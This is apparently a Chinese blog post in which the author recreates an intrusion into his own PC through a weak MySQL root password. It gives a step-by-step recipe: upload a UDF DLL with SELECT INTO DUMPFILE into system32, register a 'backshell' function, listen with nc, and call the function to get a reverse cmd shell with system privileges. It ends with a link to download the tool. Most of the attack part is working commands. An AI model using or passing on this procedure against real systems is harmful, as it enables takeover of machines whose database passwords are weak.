春节期间电脑由于Mysql弱口令导致系统被入侵,这两天一直在模拟入侵过程。在网上查阅了好多资料,也问了几个网友,最终成功地利用Mysql弱口令入侵了我自己的电脑。
前面的入侵过程没有问题,问题出在了那个my_udf.dll文件上,我判断可能是由于数据库版本的不同,新版本的数据库已经不再支持my_udf.dll文件函数造成的。之前还到处下载my_udf.dll这个文件,其实这个文件已经不能用了。
后来在网上搜索到了Langouster写的Langouster_udf.Dll_专用PHP网马,这个是东东是webshell提权的时候用到的,用的时候需要将php文件上传到webshell空间,那么我们可以利用网马中带的二进制dll文件来代替my_udf.dll。
下面是我模拟Mysql弱口令取得系统权限详细步骤:
1.修改mysql.txt文件 因为不同的dll文件可用的函数名称不一样
简单解释一下,第一行是指使用mysql这个数据库自带的库,后面连续的内容是dll文件的二进制形式。
create table Ghost(data LONGBLOB);
insert into Ghost values("");update Ghost set data = @a;
select data from Ghost into DUMPFILE 'c:\\windows\\system32\\udf.dll';
这几行的功能是将dll文件通过mysql客户端上传到目标电脑的硬盘上。
CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll';
select backshell('');
这两行是Langouster写的Langouster_udf.dll文件的函数调用方法,当然还有其他的函数,我在这里用的是反弹cmd。
2.利用Mysql客户端实现入侵
连接远程电脑的Mysql数据库 mysql -u root -h 192.168.0.234 – p 这个ip为目标电脑的ip
输入密码后转到mysql>
在提示符下直接输入 \. c:\mysql.txt 回车
3.在本地用nc监听反弹端口 nc -l -p 33333 这个端口是随便填的 但要记住在数据库执行backshell函数时要填这个端口。
4.执行backshell函数反弹cmd 在mysql> 下输入:select backshell(“自己电脑ip”,33333);
按以上步骤就可以得到目标电脑的系统权限了。
后记:这个dll文件会被杀毒软件杀掉,还有就是不同的dll文件执行函数名称也不同。
Mysql弱口令取得系统权限工具下载 解压密码:www.fendou.info
